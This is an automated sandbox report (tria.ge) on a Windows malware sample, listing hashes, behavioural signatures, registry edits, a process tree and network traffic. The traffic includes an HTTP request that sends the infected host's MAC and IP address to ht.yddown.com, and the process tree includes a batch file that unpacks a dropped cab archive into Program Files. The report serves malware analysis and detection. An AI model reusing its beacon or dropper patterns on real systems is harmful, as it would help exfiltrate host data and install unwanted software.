Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
150s -
max time network
156s -
platform
windows10-2004_x64 -
resource
win10v2004-20220901-en -
resource tags
arch:x64arch:x86image:win10v2004-20220901-enlocale:en-usos:windows10-2004-x64system -
submitted
30/10/2022, 15:04 UTC
Static task
static1
Behavioral task
behavioral1
Sample
e2706de1fb70cd65825cbbec0600408741dd72842866700224cf0c98ac9fac17.exe
Resource
win7-20220812-en
Behavioral task
behavioral2
Sample
e2706de1fb70cd65825cbbec0600408741dd72842866700224cf0c98ac9fac17.exe
Resource
win10v2004-20220901-en
General
-
Target
e2706de1fb70cd65825cbbec0600408741dd72842866700224cf0c98ac9fac17.exe
-
Size
640KB
-
MD5
82a76655f9d478df789133e5023a6c71
-
SHA1
32060f686b335039cd06cd6aed41db169e05fa4a
-
SHA256
e2706de1fb70cd65825cbbec0600408741dd72842866700224cf0c98ac9fac17
-
SHA512
0867f210868114733244c9822f680639f82c1ed04aa56f0a786810400818afd7193c88a570953936f41173c5d473b8851684bd79fbb12df4543268913594dafd
-
SSDEEP
6144:nFYFN2CESrfI067dvxzEqjC0nzHHGSukYJ2cKLERd3lhv1do8hl3Xe69Ufcky:nFMocfIv7DzEqjrn2twEj3v1PNky
Malware Config
Signatures
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation e2706de1fb70cd65825cbbec0600408741dd72842866700224cf0c98ac9fac17.exe -
Drops file in Program Files directory 4 IoCs
description ioc Process File created \??\c:\progra~1\kingsoft\kingsoft.cab expand.exe File opened for modification C:\progra~1\Maxthon\Config\config.ini e2706de1fb70cd65825cbbec0600408741dd72842866700224cf0c98ac9fac17.exe File opened for modification C:\progra~1\TheWorld 3\TheWorld.ini e2706de1fb70cd65825cbbec0600408741dd72842866700224cf0c98ac9fac17.exe File opened for modification C:\progra~1\Maxthon2\SharedAccount\Config\Config.ini e2706de1fb70cd65825cbbec0600408741dd72842866700224cf0c98ac9fac17.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
description ioc Process Set value (data) \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 700fecbeefecd801 iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\AdminActive\{E96BA48F-58E2-11ED-A0EE-D64C4877EDD1} = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateHighDateTime = "30993647" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "30993647" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000043e2eb2e51ccf149ab640c8bdb0d7906000000000200000000001066000000010000200000005d020804af1ca825cbf5d402cdfd0a890edca7216d15007ece0b1e9df31ed88b000000000e8000000002000020000000f8fa87a23f162da3c4cf10996d83acd3ef0123329964ca253d0e1141b7f7a85c200000003c61ed5644052d7882cbc32de1e9dac9898238577dda2ae62c37d27fb1ebeb1f400000003ae119c61ca53e022e2c7f3a6a1e74d5308f0c8996b7983da05ce46601b4e298c91cf7a22d32664014ad73799c1ba3fdac26ab9c7ead78baee34357eaa301070 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastTTLLowDateTime = "1251635200" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion iexplore.exe Key created \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames iexplore.exe Key created \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Internet Explorer\DomainSuggestion iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "3187989957" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "373961687" iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Internet Explorer\VersionManager iexplore.exe Key created \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Internet Explorer\VersionManager IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "3192988837" IEXPLORE.EXE Set value (str) \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames\en-US = "en-US.1" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage iexplore.exe Key created \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\ iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive iexplore.exe Key created \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateLowDateTime = "3187989957" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateLowDateTime = "3192988837" IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateHighDateTime = "30993647" IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastTTLHighDateTime = "50" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "30993647" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames\ iexplore.exe Key created \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Internet Explorer\Main iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 8072e2beefecd801 iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FullScreen = "no" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000043e2eb2e51ccf149ab640c8bdb0d790600000000020000000000106600000001000020000000f10802f0bc10bf1ff9b4db090ca97136bbc6b55051ebc9c26d7d4c62cc1b72c5000000000e8000000002000020000000064833eb00636bcab50b2a80c239b22bf84e7d9da4378171ef2b2b2d77e656e720000000e03581614d37347ce825c8938a0201f9436bae5224b4b6f0d130b66dd9563e41400000000565dd63d2d7534d950bfe8332c249eed0ce8315fc67c64cad274161dd630720c6bea7d15637e5f0ccf7a3315301e5f4d22965a32975d3f1f7b3fcd169fd821c iexplore.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 3532 e2706de1fb70cd65825cbbec0600408741dd72842866700224cf0c98ac9fac17.exe 3532 e2706de1fb70cd65825cbbec0600408741dd72842866700224cf0c98ac9fac17.exe 3532 e2706de1fb70cd65825cbbec0600408741dd72842866700224cf0c98ac9fac17.exe 3532 e2706de1fb70cd65825cbbec0600408741dd72842866700224cf0c98ac9fac17.exe 3532 e2706de1fb70cd65825cbbec0600408741dd72842866700224cf0c98ac9fac17.exe 3532 e2706de1fb70cd65825cbbec0600408741dd72842866700224cf0c98ac9fac17.exe 3532 e2706de1fb70cd65825cbbec0600408741dd72842866700224cf0c98ac9fac17.exe 3532 e2706de1fb70cd65825cbbec0600408741dd72842866700224cf0c98ac9fac17.exe 3532 e2706de1fb70cd65825cbbec0600408741dd72842866700224cf0c98ac9fac17.exe 3532 e2706de1fb70cd65825cbbec0600408741dd72842866700224cf0c98ac9fac17.exe 3532 e2706de1fb70cd65825cbbec0600408741dd72842866700224cf0c98ac9fac17.exe 3532 e2706de1fb70cd65825cbbec0600408741dd72842866700224cf0c98ac9fac17.exe 3532 e2706de1fb70cd65825cbbec0600408741dd72842866700224cf0c98ac9fac17.exe 3532 e2706de1fb70cd65825cbbec0600408741dd72842866700224cf0c98ac9fac17.exe 3532 e2706de1fb70cd65825cbbec0600408741dd72842866700224cf0c98ac9fac17.exe 3532 e2706de1fb70cd65825cbbec0600408741dd72842866700224cf0c98ac9fac17.exe 3532 e2706de1fb70cd65825cbbec0600408741dd72842866700224cf0c98ac9fac17.exe 3532 e2706de1fb70cd65825cbbec0600408741dd72842866700224cf0c98ac9fac17.exe 3532 e2706de1fb70cd65825cbbec0600408741dd72842866700224cf0c98ac9fac17.exe 3532 e2706de1fb70cd65825cbbec0600408741dd72842866700224cf0c98ac9fac17.exe 3532 e2706de1fb70cd65825cbbec0600408741dd72842866700224cf0c98ac9fac17.exe 3532 e2706de1fb70cd65825cbbec0600408741dd72842866700224cf0c98ac9fac17.exe 3532 e2706de1fb70cd65825cbbec0600408741dd72842866700224cf0c98ac9fac17.exe 3532 e2706de1fb70cd65825cbbec0600408741dd72842866700224cf0c98ac9fac17.exe 3532 e2706de1fb70cd65825cbbec0600408741dd72842866700224cf0c98ac9fac17.exe 3532 e2706de1fb70cd65825cbbec0600408741dd72842866700224cf0c98ac9fac17.exe 3532 e2706de1fb70cd65825cbbec0600408741dd72842866700224cf0c98ac9fac17.exe 3532 e2706de1fb70cd65825cbbec0600408741dd72842866700224cf0c98ac9fac17.exe 3532 e2706de1fb70cd65825cbbec0600408741dd72842866700224cf0c98ac9fac17.exe 3532 e2706de1fb70cd65825cbbec0600408741dd72842866700224cf0c98ac9fac17.exe 3532 e2706de1fb70cd65825cbbec0600408741dd72842866700224cf0c98ac9fac17.exe 3532 e2706de1fb70cd65825cbbec0600408741dd72842866700224cf0c98ac9fac17.exe 3532 e2706de1fb70cd65825cbbec0600408741dd72842866700224cf0c98ac9fac17.exe 3532 e2706de1fb70cd65825cbbec0600408741dd72842866700224cf0c98ac9fac17.exe 3532 e2706de1fb70cd65825cbbec0600408741dd72842866700224cf0c98ac9fac17.exe 3532 e2706de1fb70cd65825cbbec0600408741dd72842866700224cf0c98ac9fac17.exe 3532 e2706de1fb70cd65825cbbec0600408741dd72842866700224cf0c98ac9fac17.exe 3532 e2706de1fb70cd65825cbbec0600408741dd72842866700224cf0c98ac9fac17.exe 3532 e2706de1fb70cd65825cbbec0600408741dd72842866700224cf0c98ac9fac17.exe 3532 e2706de1fb70cd65825cbbec0600408741dd72842866700224cf0c98ac9fac17.exe 3532 e2706de1fb70cd65825cbbec0600408741dd72842866700224cf0c98ac9fac17.exe 3532 e2706de1fb70cd65825cbbec0600408741dd72842866700224cf0c98ac9fac17.exe 3532 e2706de1fb70cd65825cbbec0600408741dd72842866700224cf0c98ac9fac17.exe 3532 e2706de1fb70cd65825cbbec0600408741dd72842866700224cf0c98ac9fac17.exe 3532 e2706de1fb70cd65825cbbec0600408741dd72842866700224cf0c98ac9fac17.exe 3532 e2706de1fb70cd65825cbbec0600408741dd72842866700224cf0c98ac9fac17.exe 3532 e2706de1fb70cd65825cbbec0600408741dd72842866700224cf0c98ac9fac17.exe 3532 e2706de1fb70cd65825cbbec0600408741dd72842866700224cf0c98ac9fac17.exe 3532 e2706de1fb70cd65825cbbec0600408741dd72842866700224cf0c98ac9fac17.exe 3532 e2706de1fb70cd65825cbbec0600408741dd72842866700224cf0c98ac9fac17.exe 3532 e2706de1fb70cd65825cbbec0600408741dd72842866700224cf0c98ac9fac17.exe 3532 e2706de1fb70cd65825cbbec0600408741dd72842866700224cf0c98ac9fac17.exe 3532 e2706de1fb70cd65825cbbec0600408741dd72842866700224cf0c98ac9fac17.exe 3532 e2706de1fb70cd65825cbbec0600408741dd72842866700224cf0c98ac9fac17.exe 3532 e2706de1fb70cd65825cbbec0600408741dd72842866700224cf0c98ac9fac17.exe 3532 e2706de1fb70cd65825cbbec0600408741dd72842866700224cf0c98ac9fac17.exe 3532 e2706de1fb70cd65825cbbec0600408741dd72842866700224cf0c98ac9fac17.exe 3532 e2706de1fb70cd65825cbbec0600408741dd72842866700224cf0c98ac9fac17.exe 3532 e2706de1fb70cd65825cbbec0600408741dd72842866700224cf0c98ac9fac17.exe 3532 e2706de1fb70cd65825cbbec0600408741dd72842866700224cf0c98ac9fac17.exe 3532 e2706de1fb70cd65825cbbec0600408741dd72842866700224cf0c98ac9fac17.exe 3532 e2706de1fb70cd65825cbbec0600408741dd72842866700224cf0c98ac9fac17.exe 3532 e2706de1fb70cd65825cbbec0600408741dd72842866700224cf0c98ac9fac17.exe 3532 e2706de1fb70cd65825cbbec0600408741dd72842866700224cf0c98ac9fac17.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 3532 e2706de1fb70cd65825cbbec0600408741dd72842866700224cf0c98ac9fac17.exe -
Suspicious use of FindShellTrayWindow 3 IoCs
pid Process 4204 iexplore.exe 3532 e2706de1fb70cd65825cbbec0600408741dd72842866700224cf0c98ac9fac17.exe 3532 e2706de1fb70cd65825cbbec0600408741dd72842866700224cf0c98ac9fac17.exe -
Suspicious use of SendNotifyMessage 2 IoCs
pid Process 3532 e2706de1fb70cd65825cbbec0600408741dd72842866700224cf0c98ac9fac17.exe 3532 e2706de1fb70cd65825cbbec0600408741dd72842866700224cf0c98ac9fac17.exe -
Suspicious use of SetWindowsHookEx 8 IoCs
pid Process 3532 e2706de1fb70cd65825cbbec0600408741dd72842866700224cf0c98ac9fac17.exe 3532 e2706de1fb70cd65825cbbec0600408741dd72842866700224cf0c98ac9fac17.exe 4204 iexplore.exe 4204 iexplore.exe 4304 IEXPLORE.EXE 4304 IEXPLORE.EXE 4304 IEXPLORE.EXE 4304 IEXPLORE.EXE -
Suspicious use of WriteProcessMemory 11 IoCs
description pid Process procid_target PID 3532 wrote to memory of 4204 3532 e2706de1fb70cd65825cbbec0600408741dd72842866700224cf0c98ac9fac17.exe 84 PID 3532 wrote to memory of 4204 3532 e2706de1fb70cd65825cbbec0600408741dd72842866700224cf0c98ac9fac17.exe 84 PID 4204 wrote to memory of 4304 4204 iexplore.exe 85 PID 4204 wrote to memory of 4304 4204 iexplore.exe 85 PID 4204 wrote to memory of 4304 4204 iexplore.exe 85 PID 3532 wrote to memory of 3928 3532 e2706de1fb70cd65825cbbec0600408741dd72842866700224cf0c98ac9fac17.exe 94 PID 3532 wrote to memory of 3928 3532 e2706de1fb70cd65825cbbec0600408741dd72842866700224cf0c98ac9fac17.exe 94 PID 3532 wrote to memory of 3928 3532 e2706de1fb70cd65825cbbec0600408741dd72842866700224cf0c98ac9fac17.exe 94 PID 3928 wrote to memory of 1528 3928 cmd.exe 96 PID 3928 wrote to memory of 1528 3928 cmd.exe 96 PID 3928 wrote to memory of 1528 3928 cmd.exe 96
Processes
-
C:\Users\Admin\AppData\Local\Temp\e2706de1fb70cd65825cbbec0600408741dd72842866700224cf0c98ac9fac17.exe"C:\Users\Admin\AppData\Local\Temp\e2706de1fb70cd65825cbbec0600408741dd72842866700224cf0c98ac9fac17.exe"1⤵
- Checks computer location settings
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3532 -
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" http://www.v989.com/?xy2⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4204 -
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4204 CREDAT:17410 /prefetch:23⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:4304
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\tDosJ.bat2⤵
- Suspicious use of WriteProcessMemory
PID:3928 -
C:\Windows\SysWOW64\expand.exeexpand.exe "C:\Users\Admin\AppData\Local\Temp\kingsoft.cab" -F:*.* "C:\progra~1\kingsoft"3⤵
- Drops file in Program Files directory
PID:1528
-
-
Network
-
Remote address:8.8.8.8:53Requestt.ukad.comIN AResponse
-
Remote address:8.8.8.8:53Requestwww.3322.orgIN AResponsewww.3322.orgIN CNAMEmembers.3322.netmembers.3322.netIN CNAMEdyndns.s.3322.netdyndns.s.3322.netIN A118.184.169.48
-
GEThttp://www.3322.org/dyndns/getipe2706de1fb70cd65825cbbec0600408741dd72842866700224cf0c98ac9fac17.exeRemote address:118.184.169.48:80RequestGET /dyndns/getip HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Host: www.3322.org
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
date: Mon, 31 Oct 2022 06:11:53 GMT
content-type: text/plain; charset=utf-8
transfer-encoding: chunked
vary: Accept-Encoding
-
Remote address:8.8.8.8:53Requestht.yddown.comIN AResponseht.yddown.comIN A107.167.59.228
-
GEThttp://ht.yddown.com/acjo/up_1.asp?a=D6:4C:48:77:ED:D1&b=154.61.71.51&c=0e2706de1fb70cd65825cbbec0600408741dd72842866700224cf0c98ac9fac17.exeRemote address:107.167.59.228:80RequestGET /acjo/up_1.asp?a=D6:4C:48:77:ED:D1&b=154.61.71.51&c=0 HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Host: ht.yddown.com
Cache-Control: no-cache
ResponseHTTP/1.1 404 Not Found
Date: Tue, 18 Oct 2022 08:24:52 GMT
Content-Type: text/html
Content-Length: 566
Connection: keep-alive
-
Remote address:8.8.8.8:53Requestwww.v989.comIN AResponse
-
Remote address:8.8.8.8:53Requestwww.v989.comIN AResponse
-
Remote address:8.8.8.8:53Requestt.ukad.comIN AResponse
-
Remote address:8.8.8.8:53Requestt.ukad.comIN AResponse
-
Remote address:8.8.8.8:53Requestt.ukad.comIN AResponse
-
Remote address:8.8.8.8:53Requestt.ukad.comIN AResponse
-
Remote address:8.8.8.8:53Requestt.ukad.comIN AResponse
-
Remote address:8.8.8.8:53Requestt.ukad.comIN AResponse
-
Remote address:8.8.8.8:53Requestt.ukad.comIN AResponse
-
Remote address:8.8.8.8:53Requestt.ukad.comIN AResponse
-
Remote address:8.8.8.8:53Requestt.ukad.comIN AResponse
-
Remote address:8.8.8.8:53Request14.110.152.52.in-addr.arpaIN PTRResponse
-
260 B 5
-
118.184.169.48:80http://www.3322.org/dyndns/getiphttpe2706de1fb70cd65825cbbec0600408741dd72842866700224cf0c98ac9fac17.exe710 B 318 B 12 3
HTTP Request
GET http://www.3322.org/dyndns/getipHTTP Response
200 -
107.167.59.228:80http://ht.yddown.com/acjo/up_1.asp?a=D6:4C:48:77:ED:D1&b=154.61.71.51&c=0httpe2706de1fb70cd65825cbbec0600408741dd72842866700224cf0c98ac9fac17.exe469 B 886 B 6 4
HTTP Request
GET http://ht.yddown.com/acjo/up_1.asp?a=D6:4C:48:77:ED:D1&b=154.61.71.51&c=0HTTP Response
404 -
322 B 7
-
322 B 7
-
322 B 7
-
322 B 7
-
322 B 7
-
322 B 7
-
2.8kB 8.5kB 19 18
-
1.2kB 8.1kB 15 14
-
56 B 116 B 1 1
DNS Request
t.ukad.com
-
58 B 127 B 1 1
DNS Request
www.3322.org
DNS Response
118.184.169.48
-
59 B 75 B 1 1
DNS Request
ht.yddown.com
DNS Response
107.167.59.228
-
58 B 108 B 1 1
DNS Request
www.v989.com
-
58 B 58 B 1 1
DNS Request
www.v989.com
-
56 B 116 B 1 1
DNS Request
t.ukad.com
-
56 B 116 B 1 1
DNS Request
t.ukad.com
-
56 B 116 B 1 1
DNS Request
t.ukad.com
-
56 B 116 B 1 1
DNS Request
t.ukad.com
-
56 B 116 B 1 1
DNS Request
t.ukad.com
-
56 B 116 B 1 1
DNS Request
t.ukad.com
-
56 B 116 B 1 1
DNS Request
t.ukad.com
-
56 B 116 B 1 1
DNS Request
t.ukad.com
-
56 B 116 B 1 1
DNS Request
t.ukad.com
-
72 B 146 B 1 1
DNS Request
14.110.152.52.in-addr.arpa
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776
Filesize471B
MD55ddb1febcd291eb59d3d67d24a05bfd0
SHA1fe957affe27cb991f332e7f5c86d3a15359bd3b9
SHA256ec45a385c906b3d925ebbe6532d10adec9a14c1733c756c64db5133bd9d88dcb
SHA51262d00893402fae125ae3428da2495b0eb864b125f975cd887f894f7298a4a86f361cf50aaa7c9b69f3dcb734a950c43472778ea4062b3146c3de5623d08dcd21
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776
Filesize434B
MD5362138704e78535b38bbac79494c0c14
SHA1e048f1757d0eef32c384b47a7ad58a69b4250111
SHA256b1bcd0177bf58971b31b26e33cb870f0443ad41f8a5bf845ffef9e6753df512f
SHA51278512edc5627b62bf029221fb4be387a2cf86138020d0c81ddfe31bc74b58b5448bdefd0a6f9ebaeaaff93617423e8857ac3ed0e9c8e63328f71d477ed0d3f1f
-
Filesize
108B
MD57e088598ce2c636b6e9ca009fed77d5d
SHA1017f9745191aae8555e7ade2db926350e8a2c19e
SHA256c3d87b9342ad79a44d55a953b088c43f17c4e09543d5c9da4f29065c057f0148
SHA51281d3eb04f8fbac072e532e1106a301de04c415797b713b2204fe7d00ace00b272a411e112ff4b8d5c15e1afeda124a6ad3c82edd8dc1b9b5d2176f7c013531df